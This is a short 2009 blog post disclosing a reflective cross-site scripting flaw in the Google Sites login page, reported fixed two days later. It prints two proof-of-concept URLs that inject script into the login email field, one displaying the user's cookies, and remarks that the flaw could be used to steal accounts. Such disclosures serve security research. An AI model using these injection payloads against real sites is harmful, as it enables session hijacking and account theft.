Google Sites Reflective Cross-Site Scripting

Jan 30, 2009 | Category: Google Vulns

Get it while it’s hot! Pierre Gardenat submitted a very interesting reflective cross-site scripting vulnerability affecting the login page of Google Sites.

This could be used for example to steal accounts, but don’t worry, it will probably be fixed very quickly by Google, just like the last times ;)

Enjoy!

PoC:

https://www.google.com/accounts/ServiceLoginAuth?service=jotspot&continue=http%3A%2F%2Fsites.google.com%2F%3Fhl%3Dfr&service=jotspot&ul=1&ul=1&sulf=1&UniversalLoginEmail=%22%27%2F%3E%3Cscript%3Ealert(%27Xssed%20by%20Pierre%20Gardenat%27)%3C%2Fscript%3E&uls=Valider

Cookie:

https://www.google.com/accounts/ServiceLoginAuth?service=jotspot&continue=http%3A%2F%2Fsites.google.com%2F%3Fhl%3Dfr&service=jotspot&ul=1&ul=1&sulf=1&UniversalLoginEmail=%22%27%2F%3E%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&uls=Valider

1 Feb 2009: FIXED

Mirror:

http://www.xssed.com/mirror/57587/

Related posts:

  1. [Vulnerability Cross Site Injection] Last XSS on images.google.com
  2. Gmail ancora a rischio di cross-site request forgery
  3. Google protegge Gmail e YouTube dagli attacchi cross-site
  4. Google accounts SSL login page suffers from highly critical XSS
  5. Prima Site Clinic rivolta al mercato italiano!

Bookmark and Share
Permalink Comments (0) Jan 30, 2009

Leave a Reply with your Google Account